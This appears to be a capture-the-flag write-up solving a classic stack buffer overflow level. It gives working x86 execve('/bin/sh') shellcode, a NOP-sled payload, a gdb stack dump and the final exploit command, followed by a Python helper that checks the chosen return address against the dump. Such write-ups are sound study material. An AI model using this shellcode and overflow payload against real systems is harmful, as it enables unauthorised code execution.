A typical buffer overflow challenge that takes shellcode.
Being called "simple BOF", it reminds me of struggling to get root on the old RedHat 6.2 back in the day.
The buffer size is 256.
Let's look at the payload layout briefly.
[buffer (256 bytes)] + [ebp (4 bytes)] + [ret (4 bytes)]
I put together a simple payload.
From buffer through ebp is 260 bytes.
So the NOP slide and the shellcode go in there.
The payload is as follows.
$(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36')
Since the NOP slide just passes control on to the next instruction, overwriting ret with roughly any address where a 0x90 sits is enough.
(gdb) x/100x $esp-100
0xbffffbb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbd8: 0x90909090 0x90909090 0x6850c031 0x68732f2f
0xbffffbe8: 0x69622f68 0x50e3896e 0x99e18953 0x80cd0bb0
0xbffffbf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc18: 0x90909090 0x4000fdf4 0x00000002 0xbffffc64
0xbffffc28: 0xbffffc70 0x40013868 0x00000002 0x08048380
0xbffffc38: 0x00000000 0x080483a1 0x08048430 0x00000002
0xbffffc48: 0xbffffc64 0x080482e0 0x080484bc 0x4000ae60
0xbffffc58: 0xbffffc5c 0x40013e90 0x00000002 0xbffffd50
0xbffffc68: 0xbffffd67 0x00000000 0xbffffe6e 0xbffffe90
0xbffffc78: 0xbffffe9a 0xbffffea8 0xbffffec7 0xbffffed4
0xbffffc88: 0xbffffeed 0xbfffff07 0xbfffff11 0xbfffff1f
0xbffffc98: 0xbfffff5f 0xbfffff6f 0xbfffff84 0xbfffff94
0xbffffca8: 0xbfffff9e 0xbfffffba 0xbfffffc5 0xbfffffd2
0xbffffcb8: 0xbfffffda 0x00000000 0x00000003 0x08048034
0xbffffcc8: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffcd8: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffce8: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffffcf8: 0x0000000b 0x000001f4 0x0000000c 0x000001f4
0xbffffd08: 0x0000000d 0x000001f4 0x0000000e 0x000001f4
0xbffffd18: 0x00000010 0x0febfbff 0x0000000f 0xbffffd4b
0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd48: 0x69000000 0x00363836 0x6d6f682f 0x61672f65
0xbffffd58: 0x742f6574 0x672f706d 0x6c6d6572 0x90006e69
0xbffffd68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffde8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe28: 0x90909090 0x31909090 0x2f6850c0 0x6868732f
0xbffffe38: 0x6e69622f 0x5350e389 0xb099e189 0x9080cd0b
0xbffffe48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe68: 0xf4909090 0x454c00fd 0x504f5353 0x7c3d4e45
0xbffffe78: 0x7273752f 0x6e69622f 0x73656c2f 0x70697073
0xbffffe88: 0x68732e65 0x00732520 0x52455355 0x454d414e
0xbffffe98: 0x4948003d 0x49535453 0x313d455a 0x00303030
0xbffffea8: 0x54534f48 0x454d414e 0x636f6c3d 0x6f686c61
0xbffffeb8: 0x6c2e7473 0x6c61636f 0x616d6f64 0x4c006e69
0xbffffec8: 0x414e474f 0x673d454d 0x00657461 0x4f4d4552
0xbffffed8: 0x4f484554 0x353d5453 0x36322e39 0x3931312e
0xbffffee8: 0x3636312e 0x49414d00 0x762f3d4c 0x732f7261
0xbffffef8: 0x6c6f6f70 0x69616d2f 0x61672f6c 0x54006574
0xbfffff08: 0x3d4d5245 0x69736e61 0x534f4800 0x50595454
0xbfffff18: 0x33693d45 0x50003638 0x3d485441 0x7273752f
0xbfffff28: 0x636f6c2f 0x622f6c61 0x2f3a6e69 0x3a6e6962
0xbfffff38: 0x7273752f 0x6e69622f 0x73752f3a 0x31582f72
0xbfffff48: 0x2f365231 0x3a6e6962 0x6d6f682f 0x61672f65
0xbfffff58: 0x622f6574 0x48006e69 0x3d454d4f 0x6d6f682f
0xbfffff68: 0x61672f65 0x49006574 0x5455504e 0x2f3d4352
0xbfffff78: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbfffff88: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbfffff98: 0x7461673d 0x41420065 0x455f4853 0x2f3d564e
0xbfffffa8: 0x656d6f68 0x7461672f 0x622e2f65 0x72687361
0xbfffffb8: 0x414c0063 0x653d474e 0x53555f6e 0x54534f00
0xbfffffc8: 0x3d455059 0x756e694c 0x48530078 0x3d4c564c
0xbfffffd8: 0x534c0031 0x4c4f435f 0x3d53524f 0x6f682f00
0xbfffffe8: 0x672f656d 0x2f657461 0x2f706d74 0x6d657267
0xbffffff8: 0x006e696c 0x00000000 Cannot access memory at address 0xc0000000
Let's pick something like 0xbffffdf8 as the return address...
Then the payload is complete.
./gremlin $(python -c 'print "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*36+"\xf8\xfd\xff\xbf"')
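As an added check, not part of the original post: this parses the gdb dump above into a byte map and confirms that 0xbffffdf8 really lands inside the 0x90 run, how many NOPs remain before the first shellcode byte, and why the words must be read little-endian (0x31909090 is three NOPs followed by 0x31, the first byte of the shellcode). The dump lines are copied from the output above; the twelve all-NOP lines from 0xbffffd68 to 0xbffffe18 are generated rather than pasted.

```python
import re
import struct

NOP = 0x90
LINE_RE = re.compile(r"^(0x[0-9a-f]+):\s+((?:0x[0-9a-f]{8}\s*)+)$")

# Excerpt of the `x/100x $esp-100` output above. The twelve lines from
# 0xbffffd68 to 0xbffffe18 are all 0x90909090 and are generated here.
DUMP_LINES = (
    ["0xbffffd58: 0x742f6574 0x672f706d 0x6c6d6572 0x90006e69"]
    + ["0x%08x: 0x90909090 0x90909090 0x90909090 0x90909090" % a
       for a in range(0xbffffd68, 0xbffffe28, 16)]
    + ["0xbffffe28: 0x90909090 0x31909090 0x2f6850c0 0x6868732f",
       "0xbffffe38: 0x6e69622f 0x5350e389 0xb099e189 0x9080cd0b"]
)

def parse_dump(lines):
    """Map address -> byte. gdb prints 32-bit words; x86 is little-endian,
    so the word 0x31909090 covers bytes 90 90 90 31 in memory order."""
    mem = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip pager prompts such as "(gdb)"
        addr = int(m.group(1), 16)
        for word in m.group(2).split():
            for b in struct.pack("<I", int(word, 16)):
                mem[addr] = b
                addr += 1
    return mem

def nop_run_containing(mem, target):
    """Return (start, end) of the 0x90 run around target (end exclusive)."""
    if mem.get(target) != NOP:
        return None
    start, end = target, target
    while mem.get(start - 1) == NOP:
        start -= 1
    while mem.get(end) == NOP:
        end += 1
    return start, end

def check_return_address(lines, ret):
    # Report whether ret lands in the sled and its distance to the code.
    mem = parse_dump(lines)
    run = nop_run_containing(mem, ret)
    if run is None:
        return {"in_sled": False}
    start, end = run
    return {"in_sled": True, "sled_start": start, "sled_len": end - start,
            "nops_before_shellcode": end - ret, "first_shellcode_byte": mem.get(end)}
```

For the dump above, the run is 200 bytes long starting at 0xbffffd67, and 0xbffffdf8 sits 55 NOPs before the 0x31 that opens the shellcode.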